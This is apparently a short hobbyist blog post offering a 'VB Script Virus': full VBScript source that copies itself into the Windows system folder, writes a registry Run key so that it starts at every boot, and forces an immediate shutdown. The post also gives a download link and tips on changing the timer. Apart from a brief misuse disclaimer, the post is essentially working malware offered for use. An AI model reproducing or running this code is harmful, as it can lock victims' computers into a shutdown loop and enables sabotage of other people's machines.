Note:

Guys and all the beauties visiting my Blog plz take a note that I cannot be held responsible for any misuse or mishandling of any tricks or virus codes.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
5:30 AM

VB Script Virus

Posted by JAsh

This is a VBScript code i have written which will shutdown your PC on startup...
You can change the shutdown time...
This script is meant solely for educational purpose and i shall not be held responsible for any misuse....

Save the code in a file with extension as .vbe or .vbs

Dim fso, wsh

Set wsh = WScript.CreateObject("WScript.Shell")

Set fso = WScript.CreateObject("Scripting.FileSystemObject")


If Not fso.FileExists(fso.GetSpecialFolder(1) & "\" & WScript.ScriptName) Then

fso.CopyFile WScript.ScriptFullName, fso.GetSpecialFolder(1) & "\"

End If

wsh.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\My Virus",_
fso.GetSpecialFolder(1) & "\" & WScript.ScriptName

wsh.Run "shutdown -s -t 0"


A link to download this file:

http://rapidshare.com/files/274671471/VB.vbs

Change the line below for different shutdown timings in secs...

wsh.Run "shutdown -s -t 10"

To abort shutdown type "shutdown -a" in Run


0 comments:

Post a Comment